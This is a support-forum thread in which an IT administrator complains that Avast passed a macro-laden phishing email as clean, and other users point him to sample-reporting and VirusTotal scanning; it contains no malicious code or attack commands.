Missed mail message

I received a suspicious email message and looked at the contents via a text editor. Some of the message concerns me as I’d have to perform cleaning on a coworker’s computer if they had blindly opened it. Shouldn’t this sort of thing be caught?

Some contents from the attachment:

I can forward the original message for you to look at if there’s someone on staff to receive it.

Thanks,

-Tim-

You can check suspicious mail(s) here >> https://www.opswat.com/free-tools/mesc-faq

Suggesting I go to another website or another company is asinine…

Maybe I’m in the wrong place… I’m trying to report a problem with the Avast software not doing its job. I’m supposed to be protected from this:


https://s33.postimg.cc/gm0jvzwt7/avast_Protection.png

Or, maybe I have the wrong software for my company’s antivirus needs…

Update to the latest version (18.6.2349): https://forum.avast.com/index.php?topic=221320.0

So… just for thoroughness I forwarded the message to the sanitize@metadefender.com address. I immediately got a response:

  sanitize@metadefender.com
    host smtp.antispamcloud.com [5.79.72.139]
    SMTP error from remote mail server after end of data:
    550 Message contained unsafe content (Sanesecurity.Badmacro.Doc.jpecomp)

And, in the header attachment, I notice this little blurb:

X-Antivirus: Avast (VPS 180822-2, 08/22/2018), Outbound message
X-Antivirus-Status: Clean

This was all after I updated to the newest version of Avast.

You can report a suspicious/malicious sample (File/Website) here: https://www.avast.com/report-malicious-file.php

> Maybe I'm in the wrong place.. I'm trying to report a problem with the Avast software not doing its job. I'm supposed to be protected from this:

No security program has 100% detection or zero false positives.

How to report if you think avast should detect >> https://forum.avast.com/index.php?topic=14433.msg1289438#msg1289438

If the mail contains an attachment, you can upload and check it here >> www.virustotal.com
If detected, the file will be shared among all those vendors not detecting it.

You may post link to scan result here

Reported.

Results:


https://s33.postimg.cc/57d9iz1u3/scan_Results.png

I get that not every anti-virus program is 100% because it’s not possible to guard against threats that have not been invented. I was trying to report something. Please read the full message before garnishing your pre-programmed responses. The last line of my first post was referring to the step that we just arrived at (reporting the problem).

These emails are unfortunately not infrequent and if they hadn’t increased in numbers lately I wouldn’t be trying to reach out. I’ve been lucky and not had any of my coworkers open anything, but I don’t know if I’ll continue to have that luck. I’m handling the IT for a construction company so the people I’m working with aren’t necessarily the most computer savvy.